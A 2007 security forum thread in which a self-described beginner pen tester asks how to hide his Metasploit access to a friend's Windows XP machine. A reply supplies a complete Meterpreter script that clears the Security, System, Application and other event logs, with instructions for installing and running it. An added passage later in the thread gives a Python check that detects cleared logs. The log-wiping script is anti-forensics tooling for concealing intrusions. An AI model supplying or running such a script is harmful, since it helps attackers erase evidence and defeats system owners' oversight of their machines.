Beginning Pen Tester

<<

KrisTeason

Hero Member

Posts: 515

Joined: Sat Sep 08, 2007 7:48 pm

Location: /dev/null

Post Sun Dec 23, 2007 4:30 pm

Beginning Pen Tester

Sup Everyone?
Had a basic question or so was wondering if anyone could aim me in the right direction.
A buddy of mine and I have developed a small scheme to see which of us can access each other's computers first without any type of alarm triggering. I can bypass into his with his permission using an exploit in the Metasploit Framework; however, I'd like to be a bit stealthier. I don't have any custom scripts, but I was wondering which files on a Windows XP machine should be deleted or cleared (meaning log-wise; provide a path for me if you can) so when he looks through his logs, he wouldn't be able to tell I was Any advice would help guys, thanks, and Happy Holidays.
eCPPT (Silver/Gold), eWPT, GSEC, GISP, GCIH, OSCP, OSWP
<<

boney

Jr. Member

Posts: 61

Joined: Mon Jan 15, 2007 8:46 am

Location: India

Post Mon Dec 24, 2007 11:54 am

Re: Beginning Pen Tester

Hi KrisTeason,
Well, I don't have enough expertise on Metasploit, but regarding the logs, I guess it comes under the DataStore system called LogLevel. You have to manually enable this feature. The log files are stored in the user’s configuration directory ( /.msf3/logs).
Hope that helps.

happy holidays  :)
C|EH

All my life I wanted a computer...
Now I want my life back !
<<

Kev

Sr. Member

Posts: 428

Joined: Sat Sep 29, 2007 12:26 pm

Post Mon Dec 24, 2007 3:50 pm

Re: Beginning Pen Tester

If you are just talking about XP, then it's rather simple. On your own machine, check out the Event Viewer by going to the Control Panel and then Computer Management. This will show you the normal default logging. Also check C:\WINDOWS\pfirewall.log for firewall logs, but this needs to have been activated by the user, as do some of the other logging events in XP. The firewall log is activated under the Advanced tab once you click the firewall icon in the Control Panel.
<<

KrisTeason

Hero Member

Posts: 515

Joined: Sat Sep 08, 2007 7:48 pm

Location: /dev/null

Post Mon Dec 24, 2007 5:03 pm

Re: Beginning Pen Tester

Thanks for both your guys' responses. Thanks also to Kev for providing that path to the firewall log. I was also wondering if there are any more logs that could be cleared/deleted using the meterpreter, I'm trying to make sure my homie doesn't catch me here.
eCPPT (Silver/Gold), eWPT, GSEC, GISP, GCIH, OSCP, OSWP
<<

LSOChris

Post Mon Dec 24, 2007 10:28 pm

Re: Beginning Pen Tester

here's a meterpreter script to take care of it for you.

# clears ALL the event logs  - chris [] learnsecurityonline [] com
#
# Event 517 is logged whenever the Security log is cleared, REGARDLESS of
# the status of the Audit System Events audit policy.


print_line("Clearing the Security Event Log, it will leave a 517 event\n")
log = client.sys.eventlog.open('security')
log.clear

print_line("Clearing the System Event Log\n")
log = client.sys.eventlog.open('system')
log.clear

print_line("Clearing the Application Event Log\n")
log = client.sys.eventlog.open('application')
log.clear

print_line("Clearing the Directory Service Event Log (If It Exists)\n")
log = client.sys.eventlog.open('directory service')
log.clear

print_line("Clearing the DNS Server Event Log (If It Exists)\n")
log = client.sys.eventlog.open('dns server')
log.clear

print_line("Clearing the File Replication Service Event Log (If It Exists)\n")
log = client.sys.eventlog.open('file replication service')
log.clear

print_line("Done... Have a lovely day :-)")
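Seen from the log owner's side, the comment at the top of that script is the detection signal: event 517 stays in the Security log after a clear, while for the other logs the check has to be indirect. An added example (not part of the original post; the CSV layout, baseline values and function name are assumptions, and all sample records are constructed) that flags both cases:

```python
import csv
import io
from datetime import datetime

FMT = "%Y-%m-%d %H:%M:%S"

# Constructed sample (not data from the thread): current contents of three logs,
# exported as CSV. The column layout is an assumption of this example.
CURRENT_EXPORT = """log,time,event_id,user
Security,2007-12-24 22:41:07,517,SYSTEM
Security,2007-12-24 22:45:10,528,owner
System,2007-12-24 22:41:30,7036,
Application,2007-12-20 09:12:44,1000,
Application,2007-12-24 21:58:02,1001,
"""

# Constructed sample: newest record time per log, noted by an earlier baseline run.
BASELINE_NEWEST = {
    "Security": "2007-12-24 18:00:00",
    "System": "2007-12-24 18:00:00",
    "Application": "2007-12-24 18:00:00",
}


def find_cleared_logs(export_text, baseline_newest):
    """Return sorted (log, reason) pairs for logs that look cleared."""
    findings = set()
    oldest = {}
    for row in csv.DictReader(io.StringIO(export_text)):
        when = datetime.strptime(row["time"], FMT)
        log = row["log"]
        oldest[log] = min(oldest.get(log, when), when)
        # Direct evidence: the clear itself is recorded as event 517.
        if log == "Security" and row["event_id"] == "517":
            findings.add((log, "event-517"))
    for log, seen in baseline_newest.items():
        seen_at = datetime.strptime(seen, FMT)
        if log not in oldest:
            findings.add((log, "log-empty"))
        # Indirect evidence: nothing the baseline saw is still in the log.
        # A log that wrapped completely since the baseline also matches.
        elif oldest[log] > seen_at:
            findings.add((log, "baseline-records-gone"))
    return sorted(findings)


if __name__ == "__main__":
    for log, reason in find_cleared_logs(CURRENT_EXPORT, BASELINE_NEWEST):
        print(f"{log}: {reason}")
```

The baseline only helps if it is kept off the monitored machine, since anything stored next to the logs can be removed along with them.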
<<

KrisTeason

Hero Member

Posts: 515

Joined: Sat Sep 08, 2007 7:48 pm

Location: /dev/null

Post Mon Dec 24, 2007 10:38 pm

Re: Beginning Pen Tester

Thanks Gates, All I Need To Do Is Learn How To Put This Script Into The MSF, it'd be useful for someone to aim me that way, if it's not too much trouble :D
eCPPT (Silver/Gold), eWPT, GSEC, GISP, GCIH, OSCP, OSWP
<<

LSOChris

Post Tue Dec 25, 2007 8:54 am

Re: Beginning Pen Tester

well since it's Christmas...

http://www.ethicalhacker.net/content/view/136/24/

the script goes into your scripts/meterpreter directory.

so for me it's:

cg@segfault:~/evil/msf3/scripts/meterpreter$ pwd

/home/cg/evil/msf3/scripts/meterpreter

once you get it in your scripts/meterpreter/ directory you can invoke the script by running it within your meterpreter shell.

meterpreter> run clearalllog


there are some videos on EH.net and LearnSecurityOnline.com if you need some more help

-Chris
<<

KrisTeason

Hero Member

Posts: 515

Joined: Sat Sep 08, 2007 7:48 pm

Location: /dev/null

Post Tue Dec 25, 2007 3:13 pm

Re: Beginning Pen Tester

Thanks man,
You all have a good Christmas.  ;D
eCPPT (Silver/Gold), eWPT, GSEC, GISP, GCIH, OSCP, OSWP
<<

vital

Newbie

Posts: 4

Joined: Sun Dec 30, 2007 4:35 am

Post Tue Jan 01, 2008 3:36 am

Re: Beginning Pen Tester

Hello guyz,

How can I know my password if I forgot it, like in a Yahoo account? I have forgotten all the details on my account; how can I retrieve it again? Then the next is, how can I retrieve my password again on my laptop, Windows XP and Vista, administrator?

tnx guyz

L30
<<

proudindian

Newbie

Posts: 32

Joined: Mon Dec 10, 2007 3:24 am

Post Tue Jan 01, 2008 4:06 am

Re: Beginning Pen Tester

Actually, I don't think by Metasploit without permission you can't break into his system.....???? Am I right??
<<

LSOChris

Post Tue Jan 01, 2008 8:11 am

Re: Beginning Pen Tester

vital wrote: Hello guyz,

How can I know my password if I forgot it, like in a Yahoo account? I have forgotten all the details on my account; how can I retrieve it again? Then the next is, how can I retrieve my password again on my laptop, Windows XP and Vista, administrator?

tnx guyz

L30


I think you need to return that laptop to its rightful owner
<<

don

Administrator

Posts: 4226

Joined: Sun Aug 28, 2005 10:47 pm

Location: Chicago

Post Tue Jan 01, 2008 2:35 pm

Re: Beginning Pen Tester

... and don't hijack a legitimate thread.

Don
CISSP, MCSE, CSTA, Security+ SME
